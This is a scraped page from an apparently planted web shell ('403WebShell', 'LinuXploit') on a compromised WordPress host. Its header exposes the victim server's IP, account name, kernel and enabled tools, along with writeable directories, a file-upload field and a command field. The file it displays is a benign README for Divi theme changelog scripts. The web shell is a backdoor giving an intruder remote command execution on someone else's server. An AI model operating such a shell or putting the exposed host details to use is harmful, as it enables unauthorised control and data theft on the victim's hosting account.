404 Not Found


nginx
403WebShell
403Webshell
Server IP : 85.187.128.60  /  Your IP : 216.73.217.71
Web Server : LiteSpeed
System : Linux sg1-ts103.a2hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User : homeliho ( 1690)
PHP Version : 8.2.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/homeliho/homepu.house/wp-content/themes/Divi/tools/changelog/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/homeliho/homepu.house/wp-content/themes/Divi/tools/changelog/README.md
# Divi Changelog Tools

Generates `changelog.txt`, `changelog.json`, and `changelog-internal.md` by
pulling changelog copy from PRs attached to a GitHub milestone in the
`elegantthemes/Divi` repository.

## How It Works

- Fetches a milestone and its closed issues.
- Reads each issue's **Attached PR(s)** section to find PR links.
- Extracts **Changelog Copy** from each PR body.
- Writes a new version entry to:
  - `changelog.txt`
  - `changelog.json`
  - `changelog-internal.md` (includes PR links)

## Requirements

- Node.js (20+ recommended).
- `GITHUB_TOKEN` with access to `elegantthemes/Divi`.

## Run Locally

```bash
cd tools/changelog
npm ci
GITHUB_TOKEN=ghp_... node changelog-from-milestone-auto.js \
  --target-dir=/path/to/Divi
```

### Optional Flags

- `--milestone` (`-m`): Milestone number. Optional; defaults to latest open
  **5.x.x** milestone by semver.
- `--release-version` (`-v`): Override version (otherwise derived from milestone
  title).
- `--target-dir` (`-d`): Repo root containing changelog files (default: repo root).
- `--version-output`: Write resolved version to a file path.
- `--dry-run`: Show actions without writing files.

> Local runs only update files. They do not create PRs.

## Run via GitHub Actions

Workflow: **Actions → Update Changelog**

- The milestone input is optional. When omitted, the workflow picks the latest
  open **5.x.x** milestone.
- The workflow creates a PR targeting the latest `release-5.x` branch.
- PR branch name: `chore/changelog-<version>`.

## Expected Issue / PR Format

- Issues must include an **Attached PR(s)** section with PR links.
- PRs must include a **Changelog Copy** section in the body.


Youez - 2016 - github.com/yon3zu
LinuXploit